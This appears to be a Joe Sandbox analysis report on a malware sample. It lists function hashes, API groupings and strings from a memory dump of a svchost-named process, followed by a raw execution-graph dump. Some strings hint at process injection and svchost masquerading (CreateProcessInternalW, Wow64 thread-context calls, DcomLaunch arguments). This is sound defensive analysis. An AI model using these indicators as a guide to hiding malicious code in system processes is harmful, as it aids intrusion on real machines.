                                                                                        • Source File: 00000005.00000002.2191723275.00007FF60BF81000.00000020.00000001.01000000.00000000.sdmp, Offset: 00007FF60BF80000, based on PE: true
                                                                                        • Associated: 00000005.00000002.2191479740.00007FF60BF80000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.2191881727.00007FF60BFB6000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.2192031313.00007FF60BFC4000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.2192106062.00007FF60BFCA000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.2192224584.00007FF60BFD1000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_5_2_7ff60bf80000_svchost.jbxd
                                                                                        Similarity
                                                                                        • API ID: EnvironmentExpandStrings
                                                                                        • String ID: %SystemRoot%\SysWoW64\svchost.exe$%SystemRoot%\system32\svchost.exe
                                                                                        • API String ID: 237503144-2871004979
                                                                                        • Opcode ID: 26d235ddc8eb93f07edcb8965c1cf58c0c2aab6b495efb37e2acaf60aadbeeb9
                                                                                        • Instruction ID: 677743d27f231aeb445a9d71daa268267c44c5e1a24574668bc271d0bf7f4425
                                                                                        • Opcode Fuzzy Hash: 26d235ddc8eb93f07edcb8965c1cf58c0c2aab6b495efb37e2acaf60aadbeeb9
                                                                                        • Instruction Fuzzy Hash: 35F01271A2C58291DB509B16E84052ABB70F7997C0F609435E58BC3A78DF2CE554DF40
                                                                                        Function 00007FF60BF81088 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 16libraryloaderCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000005.00000002.2191723275.00007FF60BF81000.00000020.00000001.01000000.00000000.sdmp, Offset: 00007FF60BF80000, based on PE: true
                                                                                        • Associated: 00000005.00000002.2191479740.00007FF60BF80000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.2191881727.00007FF60BFB6000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.2192031313.00007FF60BFC4000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.2192106062.00007FF60BFCA000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.2192224584.00007FF60BFD1000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_5_2_7ff60bf80000_svchost.jbxd
                                                                                        Similarity
                                                                                        • API ID: AddressHandleModuleProc
                                                                                        • String ID: GetThreadId$kernel32
                                                                                        • API String ID: 1646373207-2383230424
                                                                                        • Opcode ID: e461afaf8c1bd09b320089634cf66b20fcf42d2cd2d08406a6f8b5433de6df5f
                                                                                        • Instruction ID: 8086eec9b8cde3c64de95e1ce9a823734d6df6fe6756e2ab568b646744b84780
                                                                                        • Opcode Fuzzy Hash: e461afaf8c1bd09b320089634cf66b20fcf42d2cd2d08406a6f8b5433de6df5f
                                                                                        • Instruction Fuzzy Hash: 3EE0ED21918A82D2DB209B15F804729A3A0FB8C744F608530D58FC36B4EF7CD649CA00
                                                                                        Function 00007FF60BF81600 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 15libraryloaderCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000005.00000002.2191723275.00007FF60BF81000.00000020.00000001.01000000.00000000.sdmp, Offset: 00007FF60BF80000, based on PE: true
                                                                                        • Associated: 00000005.00000002.2191479740.00007FF60BF80000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.2191881727.00007FF60BFB6000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.2192031313.00007FF60BFC4000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.2192106062.00007FF60BFCA000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.2192224584.00007FF60BFD1000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_5_2_7ff60bf80000_svchost.jbxd
                                                                                        Similarity
                                                                                        • API ID: AddressHandleModuleProc
                                                                                        • String ID: CreateProcessInternalW$kernel32
                                                                                        • API String ID: 1646373207-4069603262
                                                                                        • Opcode ID: d95c6e7916faab0d17594eb83d8a00f0299812b173539474de4610889b1bf182
                                                                                        • Instruction ID: 06466fdf96f46c1bd12e88018d5f1679db8578393697463fd03d38161bd45e4c
                                                                                        • Opcode Fuzzy Hash: d95c6e7916faab0d17594eb83d8a00f0299812b173539474de4610889b1bf182
                                                                                        • Instruction Fuzzy Hash: 64E01A24D0DA42A1E6109B05E80072463A0BB4C380FA08630D49FC3270EF6CE1A98600
                                                                                        Function 00007FF60BF9BCD8 Relevance: 6.1, APIs: 4, Instructions: 121COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000005.00000002.2191723275.00007FF60BF81000.00000020.00000001.01000000.00000000.sdmp, Offset: 00007FF60BF80000, based on PE: true
                                                                                        • Associated: 00000005.00000002.2191479740.00007FF60BF80000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.2191881727.00007FF60BFB6000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.2192031313.00007FF60BFC4000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.2192106062.00007FF60BFCA000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.2192224584.00007FF60BFD1000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_5_2_7ff60bf80000_svchost.jbxd
                                                                                        Similarity
                                                                                        • API ID: Mtx_guardMtx_guard::~_$char_traits
                                                                                        • String ID:
                                                                                        • API String ID: 1723400902-0
                                                                                        • Opcode ID: 3577689191e647b2eba0244f68066ee36e99a69f77505bdd8bbac9a00180cfdb
                                                                                        • Instruction ID: 9fa1e85ddc64dc972aa22342ad7d30952158fc48dbb4e3b654abe385c3a6ba33
                                                                                        • Opcode Fuzzy Hash: 3577689191e647b2eba0244f68066ee36e99a69f77505bdd8bbac9a00180cfdb
                                                                                        • Instruction Fuzzy Hash: F151BE76A1CB8582DA10DF5AF45426EA761FBC9B84F104126EB9EC7B79DF3CD0418B00
                                                                                        Function 00007FF60BFB00B0 Relevance: 6.1, APIs: 4, Instructions: 76COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000005.00000002.2191723275.00007FF60BF81000.00000020.00000001.01000000.00000000.sdmp, Offset: 00007FF60BF80000, based on PE: true
                                                                                        • Associated: 00000005.00000002.2191479740.00007FF60BF80000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.2191881727.00007FF60BFB6000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.2192031313.00007FF60BFC4000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.2192106062.00007FF60BFCA000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.2192224584.00007FF60BFD1000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_5_2_7ff60bf80000_svchost.jbxd
                                                                                        Similarity
                                                                                        • API ID: ByteCharErrorLastMultiWide
                                                                                        • String ID:
                                                                                        • API String ID: 203985260-0
                                                                                        • Opcode ID: cc073f878938fc799904678768523023e3297de0d63febdb3c1fef3ad7fee24c
                                                                                        • Instruction ID: 1a871fddeb7e80399f3ee3f8a210da4ec8ebe29d2a47b13dad86e3231d983e5a
                                                                                        • Opcode Fuzzy Hash: cc073f878938fc799904678768523023e3297de0d63febdb3c1fef3ad7fee24c
                                                                                        • Instruction Fuzzy Hash: 44313232A0878282EB149B35A41057B76D5FB88BA4F248739EA9AD7BF5DF3CD0118714
                                                                                        Function 00007FF60BF82838 Relevance: 6.1, APIs: 4, Instructions: 64threadCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000005.00000002.2191723275.00007FF60BF81000.00000020.00000001.01000000.00000000.sdmp, Offset: 00007FF60BF80000, based on PE: true
                                                                                        • Associated: 00000005.00000002.2191479740.00007FF60BF80000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.2191881727.00007FF60BFB6000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.2192031313.00007FF60BFC4000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.2192106062.00007FF60BFCA000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.2192224584.00007FF60BFD1000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_5_2_7ff60bf80000_svchost.jbxd
                                                                                        Similarity
                                                                                        • API ID: ContextThread$Wow64
                                                                                        • String ID:
                                                                                        • API String ID: 275855601-0
                                                                                        • Opcode ID: 590e80803c6a6598f6d34bf0cb9d71fc8d16245109229eb697420b8701098099
                                                                                        • Instruction ID: cf5a824fcc2c93b6c3918298861afd80843e37b5349505c2845a57e7bf6ec434
                                                                                        • Opcode Fuzzy Hash: 590e80803c6a6598f6d34bf0cb9d71fc8d16245109229eb697420b8701098099
                                                                                        • Instruction Fuzzy Hash: 6031E93260D6C696EB70CB15E44436AA7E5FB88B84F908536DA8EC3B68DF7CD544CB40
                                                                                        Function 00007FF60BF81E8C Relevance: 6.0, APIs: 4, Instructions: 39fileCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000005.00000002.2191723275.00007FF60BF81000.00000020.00000001.01000000.00000000.sdmp, Offset: 00007FF60BF80000, based on PE: true
                                                                                        • Associated: 00000005.00000002.2191479740.00007FF60BF80000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.2191881727.00007FF60BFB6000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.2192031313.00007FF60BFC4000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.2192106062.00007FF60BFCA000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.2192224584.00007FF60BFD1000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_5_2_7ff60bf80000_svchost.jbxd
                                                                                        Similarity
                                                                                        • API ID: File$Pointer$SizeWrite
                                                                                        • String ID:
                                                                                        • API String ID: 2087530826-0
                                                                                        • Opcode ID: 01f372b973729d4a890a8b11a1021b7c09579b66db996895b4a0bbe09a2f144b
                                                                                        • Instruction ID: 9b0b7cb77ab1ab8f358b48b04d3551acb845f1f2e66659a2e0758d34971df4fc
                                                                                        • Opcode Fuzzy Hash: 01f372b973729d4a890a8b11a1021b7c09579b66db996895b4a0bbe09a2f144b
                                                                                        • Instruction Fuzzy Hash: 8F119A76A28A8197DB50DF2AE454A1AB761F7C9740F509125FA8FC3B28DF3DD5058B00
                                                                                        Function 00007FF60BF87DF4 Relevance: 6.0, APIs: 4, Instructions: 35COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000005.00000002.2191723275.00007FF60BF81000.00000020.00000001.01000000.00000000.sdmp, Offset: 00007FF60BF80000, based on PE: true
                                                                                        • Associated: 00000005.00000002.2191479740.00007FF60BF80000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.2191881727.00007FF60BFB6000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.2192031313.00007FF60BFC4000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.2192106062.00007FF60BFCA000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.2192224584.00007FF60BFD1000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_5_2_7ff60bf80000_svchost.jbxd
                                                                                        Similarity
                                                                                        • API ID: shared_ptr$allocator
                                                                                        • String ID:
                                                                                        • API String ID: 426846764-0
                                                                                        • Opcode ID: 46d84b3b4c7e8204a3866c78015af3c28403f43d119607c22453800ec736fa57
                                                                                        • Instruction ID: 25fcf86a1d35f546aa9e1689fbeeab094979d39419a4a481f600d5ae1bcd0062
                                                                                        • Opcode Fuzzy Hash: 46d84b3b4c7e8204a3866c78015af3c28403f43d119607c22453800ec736fa57
                                                                                        • Instruction Fuzzy Hash: 0101BA6291CB8581EA11EB16E44106EA760FBC8B84F608532EACEC777ADF7CD551CB40
                                                                                        Function 00007FF60BF87B08 Relevance: 6.0, APIs: 4, Instructions: 34COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000005.00000002.2191723275.00007FF60BF81000.00000020.00000001.01000000.00000000.sdmp, Offset: 00007FF60BF80000, based on PE: true
                                                                                        • Associated: 00000005.00000002.2191479740.00007FF60BF80000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.2191881727.00007FF60BFB6000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.2192031313.00007FF60BFC4000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.2192106062.00007FF60BFCA000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.2192224584.00007FF60BFD1000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_5_2_7ff60bf80000_svchost.jbxd
                                                                                        Similarity
                                                                                        • API ID: shared_ptr$allocator
                                                                                        • String ID:
                                                                                        • API String ID: 426846764-0
                                                                                        • Opcode ID: aa8f5e9cd53f442f27dac48b976c39207e82458efe65fc0543b9c79fb7a2506d
                                                                                        • Instruction ID: 24b9c0ace3233e8bc8d2ab74dc2f5fc3dc40a69b3a85ef8ccbb2c0143cb2892f
                                                                                        • Opcode Fuzzy Hash: aa8f5e9cd53f442f27dac48b976c39207e82458efe65fc0543b9c79fb7a2506d
                                                                                        • Instruction Fuzzy Hash: 2601DB62A18B8581EA10EB16F45106EA3A1FBC9BC0F609531EA8E8777ADF6CD1518B00
                                                                                        Function 00007FF60BF88320 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 196COMMON
                                                                                        Download Yara Rule
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000005.00000002.2191723275.00007FF60BF81000.00000020.00000001.01000000.00000000.sdmp, Offset: 00007FF60BF80000, based on PE: true
                                                                                        • Associated: 00000005.00000002.2191479740.00007FF60BF80000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.2191881727.00007FF60BFB6000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.2192031313.00007FF60BFC4000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.2192106062.00007FF60BFCA000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.2192224584.00007FF60BFD1000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_5_2_7ff60bf80000_svchost.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: $$$
                                                                                        • API String ID: 0-233714265
                                                                                        • Opcode ID: bea3f275805cb3c61198a70ac9404b13dde8b97b0dc19bbc96532ad67e767dc4
                                                                                        • Instruction ID: 636da981950988e9504da076fe46844630a8bca966b2714bc7ee57ac4717408a
                                                                                        • Opcode Fuzzy Hash: bea3f275805cb3c61198a70ac9404b13dde8b97b0dc19bbc96532ad67e767dc4
                                                                                        • Instruction Fuzzy Hash: B1A1F92260DAC584DA70DB16E4903AEB7A0F7C9784F60C822DA8FD7B69DF6CD545CB00
                                                                                        Function 00007FF60BF82A40 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 51stringCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000005.00000002.2191723275.00007FF60BF81000.00000020.00000001.01000000.00000000.sdmp, Offset: 00007FF60BF80000, based on PE: true
                                                                                        • Associated: 00000005.00000002.2191479740.00007FF60BF80000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.2191881727.00007FF60BFB6000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.2192031313.00007FF60BFC4000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.2192106062.00007FF60BFCA000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.2192224584.00007FF60BFD1000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_5_2_7ff60bf80000_svchost.jbxd
                                                                                        Similarity
                                                                                        • API ID: AddressHandleModuleProclstrcat
                                                                                        • String ID: -k DcomLaunch -p -s LSM$h
                                                                                        • API String ID: 1163435009-3634226398
                                                                                        • Opcode ID: cbf9cf48c1dc7b8f51cecc3bdd54dc2d48e6b5326227f3c12f8a5634a48434dd
                                                                                        • Instruction ID: 7063eaf12eb8fcb1166aae6d4158a0b57134a074b43bf8d80bd3abedc7af8bc8
                                                                                        • Opcode Fuzzy Hash: cbf9cf48c1dc7b8f51cecc3bdd54dc2d48e6b5326227f3c12f8a5634a48434dd
                                                                                        • Instruction Fuzzy Hash: 9D21E732618B8196E7608F15F4443AAB7E5FB88784F608139E6CD83B68EF7DD1598F40
                                                                                        Function 00007FF60BF833F8 Relevance: 5.0, APIs: 4, Instructions: 50COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000005.00000002.2191723275.00007FF60BF81000.00000020.00000001.01000000.00000000.sdmp, Offset: 00007FF60BF80000, based on PE: true
                                                                                        • Associated: 00000005.00000002.2191479740.00007FF60BF80000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.2191881727.00007FF60BFB6000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.2192031313.00007FF60BFC4000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.2192106062.00007FF60BFCA000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.2192224584.00007FF60BFD1000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_5_2_7ff60bf80000_svchost.jbxd
                                                                                        Similarity
                                                                                        • API ID: free$ErrorFreeHeapLast_errnomalloc
                                                                                        • String ID:
                                                                                        • API String ID: 1225357528-0
                                                                                        • Opcode ID: 5a7b4308a923f00615bebbf7bced7e92388ca8185c8d29abf5f0f076eaa07afc
                                                                                        • Instruction ID: dd0d5b50d802ea6a15d07e852a00459367148c26c09a5d04ce4a3d4a9c595970
                                                                                        • Opcode Fuzzy Hash: 5a7b4308a923f00615bebbf7bced7e92388ca8185c8d29abf5f0f076eaa07afc
                                                                                        • Instruction Fuzzy Hash: 2D21C67291C64186E7B19B15E44472A72A0FB88B58F205135F68FC7AB9CFBCE5858F08

                                                                                        Execution Graph

                                                                                        Execution Coverage:9.4%
                                                                                        Dynamic/Decrypted Code Coverage:0%
                                                                                        Signature Coverage:0.6%
                                                                                        Total number of Nodes:2000
                                                                                        Total number of Limit Nodes:66
                                                                                        execution_graph 19873 7ff7ca7a4720 19874 7ff7ca7a472b 19873->19874 19882 7ff7ca7ae5b4 19874->19882 19895 7ff7ca7af5e8 EnterCriticalSection 19882->19895 19267 7ff7ca7aec9c 19268 7ff7ca7aee8e 19267->19268 19271 7ff7ca7aecde _isindst 19267->19271 19269 7ff7ca7a43f4 _get_daylight 11 API calls 19268->19269 19287 7ff7ca7aee7e 19269->19287 19270 7ff7ca79b870 _log10_special 8 API calls 19272 7ff7ca7aeea9 19270->19272 19271->19268 19273 7ff7ca7aed5e _isindst 19271->19273 19288 7ff7ca7b54a4 19273->19288 19278 7ff7ca7aeeba 19280 7ff7ca7a9c10 _isindst 17 API calls 19278->19280 19282 7ff7ca7aeece 19280->19282 19285 7ff7ca7aedbb 19285->19287 19312 7ff7ca7b54e8 19285->19312 19287->19270 19289 7ff7ca7aed7c 19288->19289 19290 7ff7ca7b54b3 19288->19290 19294 7ff7ca7b48a8 19289->19294 19319 7ff7ca7af5e8 EnterCriticalSection 19290->19319 19295 7ff7ca7b48b1 19294->19295 19296 7ff7ca7aed91 19294->19296 19297 7ff7ca7a43f4 _get_daylight 11 API calls 19295->19297 19296->19278 19300 7ff7ca7b48d8 19296->19300 19298 7ff7ca7b48b6 19297->19298 19299 7ff7ca7a9bf0 _invalid_parameter_noinfo 37 API calls 19298->19299 19299->19296 19301 7ff7ca7b48e1 19300->19301 19302 7ff7ca7aeda2 19300->19302 19303 7ff7ca7a43f4 _get_daylight 11 API calls 19301->19303 19302->19278 19306 7ff7ca7b4908 19302->19306 19304 7ff7ca7b48e6 19303->19304 19305 7ff7ca7a9bf0 _invalid_parameter_noinfo 37 API calls 19304->19305 19305->19302 19307 7ff7ca7b4911 19306->19307 19311 7ff7ca7aedb3 19306->19311 19308 7ff7ca7a43f4 _get_daylight 11 API calls 19307->19308 19309 7ff7ca7b4916 19308->19309 19310 7ff7ca7a9bf0 _invalid_parameter_noinfo 37 API calls 19309->19310 19310->19311 19311->19278 19311->19285 19320 7ff7ca7af5e8 EnterCriticalSection 19312->19320 19935 7ff7ca7ab830 19946 7ff7ca7af5e8 EnterCriticalSection 19935->19946 19583 7ff7ca7b09c0 19594 7ff7ca7b66f4 19583->19594 19595 7ff7ca7b6701 19594->19595 19596 7ff7ca7a9c58 __free_lconv_mon 11 API calls 19595->19596 19597 7ff7ca7b671d 19595->19597 19596->19595 19598 7ff7ca7a9c58 __free_lconv_mon 11 API calls 19597->19598 19599 7ff7ca7b09c9 19597->19599 19598->19597 19600 7ff7ca7af5e8 EnterCriticalSection 19599->19600 15828 7ff7ca7a4938 15829 7ff7ca7a496f 15828->15829 15830 7ff7ca7a4952 15828->15830 15829->15830 15832 7ff7ca7a4982 CreateFileW 15829->15832 15853 7ff7ca7a43d4 15830->15853 15834 7ff7ca7a49b6 15832->15834 15835 7ff7ca7a49ec 15832->15835 15859 7ff7ca7a4a8c GetFileType 15834->15859 15885 7ff7ca7a4f14 15835->15885 15837 7ff7ca7a43f4 _get_daylight 11 API calls 15841 7ff7ca7a495f 15837->15841 15856 7ff7ca7a9bf0 15841->15856 15842 7ff7ca7a49e1 CloseHandle 15847 7ff7ca7a496a 15842->15847 15843 7ff7ca7a49cb CloseHandle 15843->15847 15844 7ff7ca7a4a20 15911 7ff7ca7a4cd4 15844->15911 15845 7ff7ca7a49f5 15906 7ff7ca7a4368 15845->15906 15852 7ff7ca7a49ff 15852->15847 15854 7ff7ca7aa5d8 _get_daylight 11 API calls 15853->15854 15855 7ff7ca7a43dd 15854->15855 15855->15837 15928 7ff7ca7a9a88 15856->15928 15858 7ff7ca7a9c09 15858->15847 15860 7ff7ca7a4b97 15859->15860 15861 7ff7ca7a4ada 15859->15861 15862 7ff7ca7a4b9f 15860->15862 15863 7ff7ca7a4bc1 15860->15863 15864 7ff7ca7a4b06 GetFileInformationByHandle 15861->15864 15869 7ff7ca7a4e10 21 API calls 15861->15869 15865 7ff7ca7a4bb2 GetLastError 15862->15865 15866 7ff7ca7a4ba3 15862->15866 15868 7ff7ca7a4be4 PeekNamedPipe 15863->15868 15883 7ff7ca7a4b82 15863->15883 15864->15865 15867 7ff7ca7a4b2f 15864->15867 15872 7ff7ca7a4368 _fread_nolock 11 API calls 15865->15872 15870 7ff7ca7a43f4 _get_daylight 11 API calls 15866->15870 15871 7ff7ca7a4cd4 51 API calls 15867->15871 15868->15883 15875 7ff7ca7a4af4 15869->15875 15870->15883 15873 7ff7ca7a4b3a 15871->15873 15872->15883 15994 7ff7ca7a4c34 15873->15994 15874 7ff7ca79b870 _log10_special 8 API calls 15877 7ff7ca7a49c4 15874->15877 15875->15864 15875->15883 15877->15842 15877->15843 15879 7ff7ca7a4c34 10 API calls 15880 7ff7ca7a4b59 15879->15880 15881 7ff7ca7a4c34 10 API calls 15880->15881 15882 7ff7ca7a4b6a 15881->15882 15882->15883 15884 7ff7ca7a43f4 _get_daylight 11 API calls 15882->15884 15883->15874 15884->15883 15886 7ff7ca7a4f4a 15885->15886 15887 7ff7ca7a43f4 _get_daylight 11 API calls 15886->15887 15905 7ff7ca7a4fe2 __std_exception_copy 15886->15905 15889 7ff7ca7a4f5c 15887->15889 15888 7ff7ca79b870 _log10_special 8 API calls 15890 7ff7ca7a49f1 15888->15890 15891 7ff7ca7a43f4 _get_daylight 11 API calls 15889->15891 15890->15844 15890->15845 15892 7ff7ca7a4f64 15891->15892 16001 7ff7ca7a7118 15892->16001 15894 7ff7ca7a4f79 15895 7ff7ca7a4f81 15894->15895 15896 7ff7ca7a4f8b 15894->15896 15897 7ff7ca7a43f4 _get_daylight 11 API calls 15895->15897 15898 7ff7ca7a43f4 _get_daylight 11 API calls 15896->15898 15902 7ff7ca7a4f86 15897->15902 15899 7ff7ca7a4f90 15898->15899 15900 7ff7ca7a43f4 _get_daylight 11 API calls 15899->15900 15899->15905 15901 7ff7ca7a4f9a 15900->15901 15903 7ff7ca7a7118 45 API calls 15901->15903 15904 7ff7ca7a4fd4 GetDriveTypeW 15902->15904 15902->15905 15903->15902 15904->15905 15905->15888 15907 7ff7ca7aa5d8 _get_daylight 11 API calls 15906->15907 15908 7ff7ca7a4375 __free_lconv_mon 15907->15908 15909 7ff7ca7aa5d8 _get_daylight 11 API calls 15908->15909 15910 7ff7ca7a4397 15909->15910 15910->15852 15913 7ff7ca7a4cfc 15911->15913 15912 7ff7ca7a4a2d 15921 7ff7ca7a4e10 15912->15921 15913->15912 16095 7ff7ca7aea34 15913->16095 15915 7ff7ca7a4d90 15915->15912 15916 7ff7ca7aea34 51 API calls 15915->15916 15917 7ff7ca7a4da3 15916->15917 15917->15912 15918 7ff7ca7aea34 51 API calls 15917->15918 15919 7ff7ca7a4db6 15918->15919 15919->15912 15920 7ff7ca7aea34 51 API calls 15919->15920 15920->15912 15922 7ff7ca7a4e2a 15921->15922 15923 7ff7ca7a4e61 15922->15923 15924 7ff7ca7a4e3a 15922->15924 15925 7ff7ca7ae8c8 21 API calls 15923->15925 15926 7ff7ca7a4e4a 15924->15926 15927 7ff7ca7a4368 _fread_nolock 11 API calls 15924->15927 15925->15926 15926->15852 15927->15926 15929 7ff7ca7a9ab3 15928->15929 15932 7ff7ca7a9b24 15929->15932 15931 7ff7ca7a9ada 15931->15858 15942 7ff7ca7a986c 15932->15942 15938 7ff7ca7a9b5f 15938->15931 15943 7ff7ca7a98c3 15942->15943 15944 7ff7ca7a9888 GetLastError 15942->15944 15943->15938 15948 7ff7ca7a98d8 15943->15948 15945 7ff7ca7a9898 15944->15945 15955 7ff7ca7aa6a0 15945->15955 15949 7ff7ca7a98f4 GetLastError SetLastError 15948->15949 15950 7ff7ca7a990c 15948->15950 15949->15950 15950->15938 15951 7ff7ca7a9c10 IsProcessorFeaturePresent 15950->15951 15952 7ff7ca7a9c23 15951->15952 15972 7ff7ca7a9924 15952->15972 15956 7ff7ca7aa6bf FlsGetValue 15955->15956 15957 7ff7ca7aa6da FlsSetValue 15955->15957 15958 7ff7ca7aa6d4 15956->15958 15960 7ff7ca7a98b3 SetLastError 15956->15960 15959 7ff7ca7aa6e7 15957->15959 15957->15960 15958->15957 15961 7ff7ca7adea8 _get_daylight 11 API calls 15959->15961 15960->15943 15962 7ff7ca7aa6f6 15961->15962 15963 7ff7ca7aa714 FlsSetValue 15962->15963 15964 7ff7ca7aa704 FlsSetValue 15962->15964 15966 7ff7ca7aa732 15963->15966 15967 7ff7ca7aa720 FlsSetValue 15963->15967 15965 7ff7ca7aa70d 15964->15965 15968 7ff7ca7a9c58 __free_lconv_mon 11 API calls 15965->15968 15969 7ff7ca7aa204 _get_daylight 11 API calls 15966->15969 15967->15965 15968->15960 15970 7ff7ca7aa73a 15969->15970 15971 7ff7ca7a9c58 __free_lconv_mon 11 API calls 15970->15971 15971->15960 15973 7ff7ca7a995e _isindst __scrt_get_show_window_mode 15972->15973 15974 7ff7ca7a9986 RtlCaptureContext RtlLookupFunctionEntry 15973->15974 15975 7ff7ca7a99c0 RtlVirtualUnwind 15974->15975 15976 7ff7ca7a99f6 